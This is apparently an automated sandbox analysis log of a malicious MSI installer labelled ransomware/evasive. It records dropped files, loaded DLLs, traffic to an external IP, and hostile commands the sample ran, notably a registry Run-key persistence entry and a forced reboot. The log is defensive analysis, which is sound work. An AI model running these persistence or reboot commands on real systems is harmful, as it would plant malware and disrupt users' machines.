Source: 2ztvLMT477.msi, MSI27FE.tmp.1.dr, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI3445.tmp.1.dr, MSI27CE.tmp.1.dr, MSI279E.tmp.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI278D.tmp.1.dr, MSI33A8.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 194.180.191.24:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 10
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6625d7.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI270F.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI278D.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI279E.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI27CE.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI27FE.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3378.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI33A8.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3445.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3475.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{40A711E6-C815-4EE1-AD60-1310D3F6EABC}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI34C4.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI88B2.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI270F.tmpJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4929011_2_00D49290
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D53FC011_2_00D53FC0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4705011_2_00D47050
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D5D05311_2_00D5D053
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CF004011_2_00CF0040
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4400011_2_00D44000
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CEE03C11_2_00CEE03C
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D871C911_2_00D871C9
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC614D11_2_00CC614D
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D522E011_2_00D522E0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D6728711_2_00D67287
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4628011_2_00D46280
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC626D11_2_00CC626D
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D3227011_2_00D32270
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4A39011_2_00D4A390
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D3238011_2_00D32380
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4538011_2_00D45380
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC634911_2_00CC6349
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D8334E11_2_00D8334E
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D2336011_2_00D23360
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D5A30011_2_00D5A300
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D004D711_2_00D004D7
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC24C011_2_00CC24C0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D504C011_2_00D504C0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D554A011_2_00D554A0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D3147011_2_00D31470
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D2A46011_2_00D2A460
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D6946011_2_00D69460
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D0243011_2_00D02430
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D285C011_2_00D285C0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D455E011_2_00D455E0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC154011_2_00CC1540
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D5D52011_2_00D5D520
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC66D511_2_00CC66D5
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CEE6AF11_2_00CEE6AF
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D236A011_2_00D236A0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC565011_2_00CC5650
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC867D11_2_00CC867D
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D487F011_2_00D487F0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D457E011_2_00D457E0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D527B011_2_00D527B0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC68DD11_2_00CC68DD
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D218B011_2_00D218B0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC18B011_2_00CC18B0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D2F85011_2_00D2F850
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D6385011_2_00D63850
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CEF86011_2_00CEF860
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D4983011_2_00D49830
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D039DC11_2_00D039DC
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC19E011_2_00CC19E0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D239E011_2_00D239E0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D5094011_2_00D50940
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC5A8011_2_00CC5A80
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC4A8011_2_00CC4A80
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC2AB011_2_00CC2AB0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D45A7011_2_00D45A70
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D3CA0011_2_00D3CA00
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC1B9011_2_00CC1B90
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CEEB0E11_2_00CEEB0E
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D22B3011_2_00D22B30
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D35C9011_2_00D35C90
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D2CC6011_2_00D2CC60
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D69DE411_2_00D69DE4
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D48D4011_2_00D48D40
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D5ED7011_2_00D5ED70
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D5BD1811_2_00D5BD18
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D28D0011_2_00D28D00
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D85D0E11_2_00D85D0E
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC2E5711_2_00CC2E57
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D60E0611_2_00D60E06
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D45E3011_2_00D45E30
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CECFA711_2_00CECFA7
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D45F1011_2_00D45F10
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D67F1811_2_00D67F18
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC1F3011_2_00CC1F30
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_05691B4011_2_05691B40
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_05691B3011_2_05691B30
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_070F004011_2_070F0040
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 12_2_05241B4012_2_05241B40
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 12_2_05241B3012_2_05241B30
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: String function: 00D621E0 appears 40 times
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: String function: 00D72E01 appears 105 times
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: String function: 00D36110 appears 32 times
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: String function: 00CEDF3C appears 229 times
Source: 2ztvLMT477.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs 2ztvLMT477.msi
Source: 2ztvLMT477.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs 2ztvLMT477.msi
Source: 2ztvLMT477.msiBinary or memory string: OriginalFilenameInstallerAnalytics.dllF vs 2ztvLMT477.msi
Source: 2ztvLMT477.msiBinary or memory string: OriginalFilenameembeddeduiproxy.dllF vs 2ztvLMT477.msi
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
Source: shi2829.tmp.3.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: classification engineClassification label: mal76.rans.evad.winMSI@15/36@3/3
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D34DD0 FormatMessageA,_strlen,GetLastError,11_2_00D34DD0
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\AdvinstAnalyticsJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMutant created: \Sessions\1\BaseNamedObjects\/h3zAmAtNG+oX6FPbikqCr57pmy6+rCiQPSfay5yBLYIMohsrPpvjRceMwKEEK88
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF828128EBC4E56A1C.TMPJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\2ztvLMT477.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DA856019EF511E6D177907A9FD12D28
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 10
Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
Source: unknownProcess created: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DA856019EF511E6D177907A9FD12D28Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 10Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"Jump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: jscript.dllJump to behavior
